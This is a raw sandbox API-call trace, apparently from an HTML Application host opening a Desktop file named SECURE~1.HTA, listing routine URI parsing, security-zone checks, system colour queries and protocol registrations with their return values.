[0036.549] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0036.549] GetProcAddress (hModule=0x7ffb3c9b0000, lpProcName=0x6) returned 0x7ffb3c9bf120
[0036.549] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2f800 | out: lpflOldProtect=0xb8a8a2f800*=0x4) returned 1
[0036.550] wcsncmp (_String1="HKCU\\", _String2="HKCU\\", _MaxCount=0x5) returned 0
[0036.550] StrCmpCW (pszStr1="Software\\Microsoft\\Internet Explorer", pszStr2="Software\\Microsoft\\Windows Mail\\Trident") returned -14
[0036.550] GetSysColor (nIndex=26) returned 0xcc6600
[0036.550] GetSysColor (nIndex=5) returned 0xffffff
[0036.550] GetSysColor (nIndex=8) returned 0x0
[0036.551] GetSysColor (nIndex=26) returned 0xcc6600
[0036.551] GetSysColor (nIndex=5) returned 0xffffff
[0036.551] GetSysColor (nIndex=8) returned 0x0
[0036.553] wcstol (in: _String="0,0,255", _EndPtr=0xb8a8a2d4c0, _Radix=10 | out: _EndPtr=0xb8a8a2d4c0*=",0,255") returned 0
[0036.554] wcstol (in: _String="0,255", _EndPtr=0xb8a8a2d4c0, _Radix=10 | out: _EndPtr=0xb8a8a2d4c0*=",255") returned 0
[0036.554] wcstol (in: _String="255", _EndPtr=0xb8a8a2d4c0, _Radix=10 | out: _EndPtr=0xb8a8a2d4c0*="") returned 255
[0036.554] wcstol (in: _String="128,0,128", _EndPtr=0xb8a8a2d4c0, _Radix=10 | out: _EndPtr=0xb8a8a2d4c0*=",0,128") returned 128
[0036.554] wcstol (in: _String="0,128", _EndPtr=0xb8a8a2d4c0, _Radix=10 | out: _EndPtr=0xb8a8a2d4c0*=",128") returned 0
[0036.554] wcstol (in: _String="128", _EndPtr=0xb8a8a2d4c0, _Radix=10 | out: _EndPtr=0xb8a8a2d4c0*="") returned 128
[0036.558] _ltow_s (in: _Value=3, _Buffer=0xb8a8a2d4d0, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0
[0036.559] _ltow_s (in: _Value=3, _Buffer=0xb8a8a2d4d0, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0
[0036.559] _ltow_s (in: _Value=3, _Buffer=0xb8a8a2d4d0, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0
[0036.559] _ltow_s (in: _Value=3, _Buffer=0xb8a8a2d4d0, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0
[0036.559] _ltow_s (in: _Value=3, _Buffer=0xb8a8a2d4d0, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0
[0036.559] _ltow_s (in: _Value=3, _Buffer=0xb8a8a2d4d0, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0
[0036.559] _ltow_s (in: _Value=3, _Buffer=0xb8a8a2d4d0, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0
[0036.559] GetAcceptLanguagesW () returned 0x0
[0036.560] LocaleNameToLCID (lpName="en-US", dwFlags=0x8000000) returned 0x409
[0036.560] LCIDToLocaleName (in: Locale=0x409, lpName=0xb8a8c3bd74, cchName=85, dwFlags=0x8000000 | out: lpName="en-US") returned 6
[0036.560] memcpy_s (in: _Destination=0xb8a8a2e9e0, _DestinationSize=0x1000, _Source=0x7ffb238e5628, _SourceSize=0xc | out: _Destination=0xb8a8a2e9e0) returned 0x0
[0036.560] GetClassNameW (in: hWnd=0x50226, lpClassName=0xb8a8a2f9e8, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9
[0036.560] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3
[0036.560] GetParent (hWnd=0x50226) returned 0x5016e
[0036.560] GetClassNameW (in: hWnd=0x5016e, lpClassName=0xb8a8a2f9e8, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9
[0036.560] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3
[0036.560] GetParent (hWnd=0x5016e) returned 0x0
[0036.566] memcpy_s (in: _Destination=0xc0aaadc4b4, _DestinationSize=0x6, _Source=0x7ffb234f4c84, _SourceSize=0x4 | out: _Destination=0xc0aaadc4b4) returned 0x0
[0036.566] memcpy_s (in: _Destination=0xc0aab101f4, _DestinationSize=0xc, _Source=0x7ffb234f4c78, _SourceSize=0xa | out: _Destination=0xc0aab101f4) returned 0x0
[0036.566] memcpy_s (in: _Destination=0xc0aab10224, _DestinationSize=0xa, _Source=0x7ffb234f4c68, _SourceSize=0x8 | out: _Destination=0xc0aab10224) returned 0x0
[0036.566] memcpy_s (in: _Destination=0xc0aab10254, _DestinationSize=0xc, _Source=0x7ffb234f4c58, _SourceSize=0xa | out: _Destination=0xc0aab10254) returned 0x0
[0036.567] memcpy_s (in: _Destination=0xc0aaadc4d4, _DestinationSize=0x6, _Source=0x7ffb234f4c50, _SourceSize=0x4 | out: _Destination=0xc0aaadc4d4) returned 0x0
[0036.567] memcpy_s (in: _Destination=0xc0aaadc4f4, _DestinationSize=0x8, _Source=0x7ffb234f4c48, _SourceSize=0x6 | out: _Destination=0xc0aaadc4f4) returned 0x0
[0036.567] memcpy_s (in: _Destination=0xc0aaadc514, _DestinationSize=0x6, _Source=0x7ffb234f4c40, _SourceSize=0x4 | out: _Destination=0xc0aaadc514) returned 0x0
[0036.567] memcpy_s (in: _Destination=0xc0aaadc534, _DestinationSize=0x8, _Source=0x7ffb234f4c38, _SourceSize=0x6 | out: _Destination=0xc0aaadc534) returned 0x0
[0036.567] _ltow_s (in: _Value=0, _Buffer=0xb8a8a2f500, _BufferCount=0x21, _Radix=10 | out: _Buffer="0") returned 0x0
[0036.567] _ltow_s (in: _Value=5, _Buffer=0xb8a8a2f500, _BufferCount=0x21, _Radix=10 | out: _Buffer="5") returned 0x0
[0036.567] _ltow_s (in: _Value=7, _Buffer=0xb8a8a2f500, _BufferCount=0x21, _Radix=10 | out: _Buffer="7") returned 0x0
[0036.567] _ltow_s (in: _Value=8, _Buffer=0xb8a8a2f500, _BufferCount=0x21, _Radix=10 | out: _Buffer="8") returned 0x0
[0036.567] _ltow_s (in: _Value=9, _Buffer=0xb8a8a2f500, _BufferCount=0x21, _Radix=10 | out: _Buffer="9") returned 0x0
[0036.567] _ltow_s (in: _Value=10, _Buffer=0xb8a8a2f500, _BufferCount=0x21, _Radix=10 | out: _Buffer="10") returned 0x0
[0036.567] _ltow_s (in: _Value=11, _Buffer=0xb8a8a2f500, _BufferCount=0x21, _Radix=10 | out: _Buffer="11") returned 0x0
[0036.567] _ltow_s (in: _Value=12, _Buffer=0xb8a8a2f500, _BufferCount=0x21, _Radix=10 | out: _Buffer="12") returned 0x0
[0036.567] memcpy_s (in: _Destination=0xc0aaadc574, _DestinationSize=0x6, _Source=0xb8a8c3c760, _SourceSize=0x4 | out: _Destination=0xc0aaadc574) returned 0x0
[0036.567] memcpy_s (in: _Destination=0xc0aaadc594, _DestinationSize=0x8, _Source=0xb8a8c3c6f0, _SourceSize=0x6 | out: _Destination=0xc0aaadc594) returned 0x0
[0036.568] IMoniker:GetDisplayName (in: This=0xb8a8c15f50, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0xb8a8a2fb28 | out: ppszDisplayName=0xb8a8a2fb28*="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA") returned 0x0
[0036.568] IUnknown:QueryInterface (in: This=0xb8a8c15f50, riid=0x7ffb233fabf8*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0xb8a8a2f990 | out: ppvObject=0xb8a8a2f990*=0xb8a8c15f68) returned 0x0
[0036.568] IUriContainer:GetIUri (in: This=0xb8a8c15f68, ppIUri=0xb8a8a2f9c0 | out: ppIUri=0xb8a8a2f9c0*=0xb8a8c30650) returned 0x0
[0036.568] IUnknown:Release (This=0xb8a8c15f68) returned 0x1
[0036.568] IUnknown:AddRef (This=0xb8a8c15f50) returned 0x2
[0036.568] IUnknown:AddRef (This=0xb8a8c30650) returned 0x6
[0036.568] IMoniker:GetDisplayName (in: This=0xb8a8c15f50, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0xb8a8a2f738 | out: ppszDisplayName=0xb8a8a2f738*="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA") returned 0x0
[0036.568] UrlGetLocationW (psz1="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA") returned 0x0
[0036.568] UrlGetLocationW (psz1=0x0) returned 0x0
[0036.568] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", ppmk=0xb8a8a2f670*=0x0, dwFlags=0x1 | out: ppmk=0xb8a8a2f670*=0xb8a8c43380) returned 0x0
[0036.569] CreateUri (in: pwzURI="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", dwFlags=0x1002b84, dwReserved=0x0, ppURI=0xb8a8a2f650 | out: ppURI=0xb8a8a2f650*=0xb8a8c431a0) returned 0x0
[0036.569] IUri:GetScheme (in: This=0xb8a8c431a0, pdwScheme=0xb8a8a2f570 | out: pdwScheme=0xb8a8a2f570*=0x9) returned 0x0
[0036.569] CoInternetIsFeatureEnabled (FeatureEntry=0x1, dwFlags=0x2) returned 0x1
[0036.570] IUnknown:AddRef (This=0xb8a8c431a0) returned 0x6
[0036.570] IUri:GetAbsoluteUri (in: This=0xb8a8c431a0, pbstrAbsoluteUri=0xc0aab20320 | out: pbstrAbsoluteUri=0xc0aab20320*="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA") returned 0x0
[0036.571] IUnknown:Release (This=0xb8a8c431a0) returned 0x5
[0036.571] IUnknown:AddRef (This=0xb8a8c43380) returned 0x2
[0036.571] IUnknown:Release (This=0xb8a8c43380) returned 0x1
[0036.571] IUnknown:AddRef (This=0xb8a8c15f50) returned 0x3
[0036.571] IUnknown:Release (This=0xb8a8c43380) returned 0x0
[0036.571] CoInternetIsFeatureEnabled (FeatureEntry=0x15, dwFlags=0x2) returned 0x1
[0036.571] IUnknown:AddRef (This=0xb8a8c15f50) returned 0x4
[0036.571] IUnknown:QueryInterface (in: This=0xb8a8c30650, riid=0x7ffb234680e0*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0xb8a8a2efb0 | out: ppvObject=0xb8a8a2efb0*=0xb8a8c30650) returned 0x0
[0036.571] IUnknown:Release (This=0xb8a8c30650) returned 0x6
[0036.571] IUnknown:AddRef (This=0xb8a8c30650) returned 0x7
[0036.571] IUnknown:QueryInterface (in: This=0xb8a8c15f50, riid=0x7ffb233fabf8*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0xb8a8a2efc0 | out: ppvObject=0xb8a8a2efc0*=0xb8a8c15f68) returned 0x0
[0036.571] IUriContainer:GetIUri (in: This=0xb8a8c15f68, ppIUri=0xb8a8a2f078 | out: ppIUri=0xb8a8a2f078*=0xb8a8c30650) returned 0x0
[0036.571] IUnknown:Release (This=0xb8a8c15f68) returned 0x4
[0036.571] IUnknown:AddRef (This=0xb8a8c15f50) returned 0x5
[0036.572] IUnknown:Release (This=0xb8a8c15f50) returned 0x4
[0036.572] IUnknown:AddRef (This=0xb8a8c30650) returned 0x9
[0036.572] IUnknown:QueryInterface (in: This=0xb8a8c30650, riid=0x7ffb234680e0*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0xb8a8a2efb0 | out: ppvObject=0xb8a8a2efb0*=0xb8a8c30650) returned 0x0
[0036.572] IUnknown:Release (This=0xb8a8c30650) returned 0x9
[0036.572] IUnknown:AddRef (This=0xb8a8c30650) returned 0xa
[0036.572] IUri:GetScheme (in: This=0xb8a8c30650, pdwScheme=0xb8a8a2efe0 | out: pdwScheme=0xb8a8a2efe0*=0x9) returned 0x0
[0036.573] GetCurrentProcessId () returned 0x700
[0036.573] GetCurrentProcessId () returned 0x700
[0036.573] IUnknown:QueryInterface (in: This=0xb8a8c30650, riid=0x7ffb234680e0*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0xb8a8a2efb0 | out: ppvObject=0xb8a8a2efb0*=0xb8a8c30650) returned 0x0
[0036.573] IUnknown:Release (This=0xb8a8c30650) returned 0xa
[0036.573] IUnknown:AddRef (This=0xb8a8c30650) returned 0xb
[0036.573] IUri:GetScheme (in: This=0xb8a8c30650, pdwScheme=0xb8a8a2efe0 | out: pdwScheme=0xb8a8a2efe0*=0x9) returned 0x0
[0036.573] IUnknown:QueryInterface (in: This=0xb8a8c30650, riid=0x7ffb234680e0*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0xb8a8a2eec0 | out: ppvObject=0xb8a8a2eec0*=0xb8a8c30650) returned 0x0
[0036.573] IUnknown:Release (This=0xb8a8c30650) returned 0xb
[0036.573] IUnknown:AddRef (This=0xb8a8c30650) returned 0xc
[0036.573] IUnknown:Release (This=0xb8a8c30650) returned 0xb
[0036.573] IUri:GetAbsoluteUri (in: This=0xb8a8c30650, pbstrAbsoluteUri=0xb8a8a2f018 | out: pbstrAbsoluteUri=0xb8a8a2f018*="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA") returned 0x0
[0036.573] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0036.573] GetProcAddress (hModule=0x7ffb3c9b0000, lpProcName=0x7) returned 0x7ffb3c9c6aa0
[0036.573] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2ed90 | out: lpflOldProtect=0xb8a8a2ed90*=0x4) returned 1
[0036.574] SysStringLen (param_1="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA") returned 0x2e
[0036.574] CreateUri (in: pwzURI="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", dwFlags=0x1002b80, dwReserved=0x0, ppURI=0xb8a8a2f170 | out: ppURI=0xb8a8a2f170*=0xb8a8c43640) returned 0x0
[0036.574] IUnknown:Release (This=0xb8a8c30650) returned 0xa
[0036.574] IUri:GetScheme (in: This=0xb8a8c43640, pdwScheme=0xb8a8a2ef50 | out: pdwScheme=0xb8a8a2ef50*=0x9) returned 0x0
[0036.574] IUri:IsEqual (in: This=0xb8a8c431a0, pUri=0xb8a8c43640, pfEqual=0xb8a8a2f010 | out: pfEqual=0xb8a8a2f010*=1) returned 0x0
[0036.574] IUnknown:AddRef (This=0xb8a8c431a0) returned 0x4
[0036.574] IUri:GetPropertyDWORD (in: This=0xb8a8c431a0, uriProp=0x11, pdwProperty=0xb8a8a2ed00, dwFlags=0x0 | out: pdwProperty=0xb8a8a2ed00*=0x9) returned 0x0
[0036.574] IUnknown:Release (This=0xb8a8c431a0) returned 0x3
[0036.574] IUnknown:AddRef (This=0xb8a8c38780) returned 0x2
[0036.574] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0036.574] GetProcAddress (hModule=0x7ffb2ea50000, lpProcName=0x207) returned 0x7ffb2ea6bbc0
[0036.574] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2cb00 | out: lpflOldProtect=0xb8a8a2cb00*=0x4) returned 1
[0036.574] IUnknown:QueryInterface (in: This=0x7ffb238e5d88, riid=0x7ffb2eb48bc8*(Data1=0xc90db44a, Data2=0x1902, Data3=0x451e, Data4=([0]=0xbd, [1]=0xf0, [2]=0x5c, [3]=0x89, [4]=0x66, [5]=0xb, [6]=0x52, [7]=0x8c)), ppvObject=0xb8a8a2cb60 | out: ppvObject=0xb8a8a2cb60*=0x0) returned 0x80004002
[0036.574] IInternetSecurityManager:GetSecurityId (in: This=0x7ffb238e5d88, pwszUrl="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", pbSecurityId=0xb8a8a2edd0, pcbSecurityId=0xb8a8a2edc0*=0x200, dwReserved=0x0 | out: pbSecurityId=0xb8a8a2edd0*=0x0, pcbSecurityId=0xb8a8a2edc0*=0x200) returned 0x800c0011
[0036.596] IUnknown:Release (This=0xb8a8c38780) returned 0x1
[0036.596] memcpy_s (in: _Destination=0xb8a8c1ef50, _DestinationSize=0xa, _Source=0xb8a8a2edd0, _SourceSize=0xa | out: _Destination=0xb8a8c1ef50) returned 0x0
[0036.596] memcpy_s (in: _Destination=0xb8a8c1ec90, _DestinationSize=0xa, _Source=0xb8a8a2edd0, _SourceSize=0xa | out: _Destination=0xb8a8c1ec90) returned 0x0
[0036.597] ParseURLW (in: pcszURL="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", ppu=0xb8a8a2ef30 | out: ppu=0xb8a8a2ef30) returned 0x0
[0036.597] GetDC (hWnd=0x0) returned 0x901076b
[0036.597] CreateCompatibleBitmap (hdc=0x901076b, cx=1, cy=1) returned 0x33050557
[0036.597] GetDIBits (in: hdc=0x901076b, hbm=0x33050557, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0xb8a8a2eb00, usage=0x0 | out: lpvBits=0x0, lpbmi=0xb8a8a2eb00) returned 1
[0036.597] GetDIBits (in: hdc=0x901076b, hbm=0x33050557, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0xb8a8a2eb00, usage=0x0 | out: lpvBits=0x0, lpbmi=0xb8a8a2eb00) returned 1
[0036.597] DeleteObject (ho=0x33050557) returned 1
[0036.597] GetSysColor (nIndex=0) returned 0xc8c8c8
[0036.597] GetSysColor (nIndex=1) returned 0x0
[0036.597] GetSysColor (nIndex=2) returned 0xd1b499
[0036.597] GetSysColor (nIndex=3) returned 0xdbcdbf
[0036.597] GetSysColor (nIndex=4) returned 0xf0f0f0
[0036.597] GetSysColor (nIndex=5) returned 0xffffff
[0036.597] GetSysColor (nIndex=6) returned 0x646464
[0036.597] GetSysColor (nIndex=7) returned 0x0
[0036.597] GetSysColor (nIndex=8) returned 0x0
[0036.597] GetSysColor (nIndex=9) returned 0x0
[0036.597] GetSysColor (nIndex=10) returned 0xb4b4b4
[0036.597] GetSysColor (nIndex=11) returned 0xfcf7f4
[0036.597] GetSysColor (nIndex=12) returned 0xababab
[0036.597] GetSysColor (nIndex=13) returned 0xff9933
[0036.597] GetSysColor (nIndex=14) returned 0xffffff
[0036.597] GetSysColor (nIndex=15) returned 0xf0f0f0
[0036.597] GetSysColor (nIndex=16) returned 0xa0a0a0
[0036.597] GetSysColor (nIndex=17) returned 0x6d6d6d
[0036.597] GetSysColor (nIndex=18) returned 0x0
[0036.597] GetSysColor (nIndex=19) returned 0x0
[0036.597] GetSysColor (nIndex=20) returned 0xffffff
[0036.597] GetSysColor (nIndex=21) returned 0x696969
[0036.597] GetSysColor (nIndex=22) returned 0xe3e3e3
[0036.597] GetSysColor (nIndex=23) returned 0x0
[0036.597] GetSysColor (nIndex=24) returned 0xe1ffff
[0036.597] GetSysColor (nIndex=25) returned 0x0
[0036.597] GetSysColor (nIndex=26) returned 0xcc6600
[0036.597] GetSysColor (nIndex=27) returned 0xead1b9
[0036.597] GetSysColor (nIndex=28) returned 0xf2e4d7
[0036.597] GetSysColor (nIndex=29) returned 0xff9933
[0036.597] GetSysColor (nIndex=30) returned 0xf0f0f0
[0036.597] GetSysColor (nIndex=31) returned 0x0
[0036.597] GetSysColor (nIndex=32) returned 0x0
[0036.597] GetSysColor (nIndex=33) returned 0x0
[0036.597] GetSysColor (nIndex=34) returned 0x0
[0036.597] GetSysColor (nIndex=35) returned 0x0
[0036.597] GetSysColor (nIndex=36) returned 0x0
[0036.597] GetSysColor (nIndex=37) returned 0x0
[0036.597] GetSysColor (nIndex=38) returned 0x0
[0036.598] GetSysColor (nIndex=39) returned 0x0
[0036.598] GetSysColor (nIndex=40) returned 0x0
[0036.598] GetSysColor (nIndex=41) returned 0x0
[0036.598] GetSysColor (nIndex=42) returned 0x0
[0036.598] GetSysColor (nIndex=43) returned 0x0
[0036.598] GetSysColor (nIndex=44) returned 0x0
[0036.598] GetSysColor (nIndex=45) returned 0x0
[0036.598] GetSysColor (nIndex=46) returned 0x0
[0036.598] GetSysColor (nIndex=47) returned 0x0
[0036.598] GetSysColor (nIndex=48) returned 0x0
[0036.598] GetSysColor (nIndex=49) returned 0x0
[0036.598] GetSysColor (nIndex=50) returned 0x0
[0036.598] GetSysColor (nIndex=51) returned 0x0
[0036.598] GetSysColor (nIndex=52) returned 0x0
[0036.598] GetSysColor (nIndex=53) returned 0x0
[0036.598] GetSysColor (nIndex=54) returned 0x0
[0036.598] GetSysColor (nIndex=55) returned 0x0
[0036.598] GetSysColor (nIndex=56) returned 0x0
[0036.598] GetSysColor (nIndex=57) returned 0x0
[0036.598] GetSysColor (nIndex=58) returned 0x0
[0036.598] GetSysColor (nIndex=59) returned 0x0
[0036.598] GetSysColor (nIndex=60) returned 0x0
[0036.598] GetSysColor (nIndex=61) returned 0x0
[0036.598] GetSysColor (nIndex=62) returned 0x0
[0036.598] GetSysColor (nIndex=63) returned 0x0
[0036.598] GetDeviceCaps (hdc=0x901076b, index=38) returned 32409
[0036.598] ReleaseDC (hWnd=0x0, hDC=0x901076b) returned 1
[0036.598] IUri:GetAbsoluteUri (in: This=0xb8a8c431a0, pbstrAbsoluteUri=0xb8a8a2f138 | out: pbstrAbsoluteUri=0xb8a8a2f138*="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA") returned 0x0
[0036.598] GetCurrentProcessId () returned 0x700
[0036.598] GetCurrentThreadId () returned 0x210
[0036.598] GetCurrentThreadId () returned 0x210
[0036.598] GetCurrentProcessId () returned 0x700
[0036.598] IUnknown:AddRef (This=0xb8a8c38780) returned 0x2
[0036.599] IUnknown:Release (This=0xb8a8c38780) returned 0x1
[0036.599] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0036.599] GetProcAddress (hModule=0x7ffb2ea50000, lpProcName=0x1e5) returned 0x7ffb2eaa3980
[0036.599] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2ec20 | out: lpflOldProtect=0xb8a8a2ec20*=0x4) returned 1
[0037.525] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0037.525] GetKeyboardLayoutNameW (in: pwszKLID=0xb8a8a2eaa0 | out: pwszKLID="00000409") returned 1
[0037.525] wcscmp (_String1="00000409", _String2="00000409") returned 0
[0037.525] ParseURLW (in: pcszURL="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", ppu=0xb8a8a2eda0 | out: ppu=0xb8a8a2eda0) returned 0x0
[0037.525] CreateUri (in: pwzURI="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", dwFlags=0x1002b84, dwReserved=0x0, ppURI=0xb8a8a2ed50 | out: ppURI=0xb8a8a2ed50*=0xb8a8c431a0) returned 0x0
[0037.525] IUnknown:AddRef (This=0xb8a8c38780) returned 0x2
[0037.525] IUnknown:AddRef (This=0xb8a8c431a0) returned 0x6
[0037.525] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0037.526] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0037.526] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0037.526] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0037.526] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0xb8a8c38780, pUri=0xb8a8c431a0, dwAction=0x2700, pPolicy=0xb8a8a2ec60, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0, pdwOutFlags=0xb8a8a2eca0 | out: pPolicy=0xb8a8a2ec60*=0x0, pdwOutFlags=0xb8a8a2eca0*=0x0) returned 0x0
[0037.526] IInternetSecurityManager:ProcessUrlAction (in: This=0x7ffb238e5d88, pwszUrl="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", dwAction=0x2700, pPolicy=0xb8a8a2ec60, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0xb8a8a2ec60*=0x0) returned 0x0
[0037.526] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0037.526] IUnknown:Release (This=0xb8a8c38780) returned 0x1
[0037.526] IUnknown:Release (This=0xb8a8c431a0) returned 0x6
[0037.526] IUnknown:Release (This=0xb8a8c431a0) returned 0x5
[0037.526] IUnknown:AddRef (This=0xb8a8c431a0) returned 0x6
[0037.526] IUri:GetPropertyDWORD (in: This=0xb8a8c431a0, uriProp=0x11, pdwProperty=0xb8a8a2eb40, dwFlags=0x0 | out: pdwProperty=0xb8a8a2eb40*=0x9) returned 0x0
[0037.526] IUnknown:Release (This=0xb8a8c431a0) returned 0x5
[0037.526] IUnknown:AddRef (This=0xb8a8c38780) returned 0x2
[0037.526] IUnknown:QueryInterface (in: This=0x7ffb238e5d88, riid=0x7ffb2eb48bc8*(Data1=0xc90db44a, Data2=0x1902, Data3=0x451e, Data4=([0]=0xbd, [1]=0xf0, [2]=0x5c, [3]=0x89, [4]=0x66, [5]=0xb, [6]=0x52, [7]=0x8c)), ppvObject=0xb8a8a2c9a0 | out: ppvObject=0xb8a8a2c9a0*=0x0) returned 0x80004002
[0037.526] IInternetSecurityManager:GetSecurityId (in: This=0x7ffb238e5d88, pwszUrl="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", pbSecurityId=0xb8a8a2ebf0, pcbSecurityId=0xb8a8a2ebe0*=0x200, dwReserved=0x0 | out: pbSecurityId=0xb8a8a2ebf0*=0x0, pcbSecurityId=0xb8a8a2ebe0*=0x200) returned 0x800c0011
[0037.526] IUnknown:Release (This=0xb8a8c38780) returned 0x1
[0037.526] memcpy_s (in: _Destination=0xb8a8c45eb0, _DestinationSize=0xa, _Source=0xb8a8a2ebf0, _SourceSize=0xa | out: _Destination=0xb8a8c45eb0) returned 0x0
[0037.528] IUri:GetPropertyBSTR (in: This=0xb8a8c431a0, uriProp=0x3, pbstrProperty=0xb8a8a2efc0, dwFlags=0x2 | out: pbstrProperty=0xb8a8a2efc0*="") returned 0x1
[0037.528] IUri:GetPropertyBSTR (in: This=0xb8a8c431a0, uriProp=0x6, pbstrProperty=0xb8a8a2efc0, dwFlags=0x2 | out: pbstrProperty=0xb8a8a2efc0*="") returned 0x1
[0037.528] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0037.528] GetProcAddress (hModule=0x7ffb2ea50000, lpProcName="CoInternetGetSession") returned 0x7ffb2ea89250
[0037.528] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2edb0 | out: lpflOldProtect=0xb8a8a2edb0*=0x4) returned 1
[0037.528] CoInternetGetSession (in: dwSessionMode=0x0, ppIInternetSession=0xb8a8a2ef70, dwReserved=0x0 | out: ppIInternetSession=0xb8a8a2ef70*=0xb8a8c307c0) returned 0x0
[0037.528] IInternetSession:RegisterNameSpace (This=0xb8a8c307c0, pCF=0x7ffb238c81b0, rclsid=0x7ffb233ee4b8, pwzProtocol="res", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0
[0037.528] IUnknown:AddRef (This=0x7ffb238c81b0) returned 0x1
[0037.529] IInternetSession:RegisterNameSpace (This=0xb8a8c307c0, pCF=0x7ffb238c81f0, rclsid=0x7ffb233ee4e8, pwzProtocol="about", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0
[0037.529] IUnknown:AddRef (This=0x7ffb238c81f0) returned 0x1
[0037.529] IInternetSession:RegisterNameSpace (This=0xb8a8c307c0, pCF=0x7ffb238c93c8, rclsid=0x7ffb233ee4d8, pwzProtocol="blob", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0
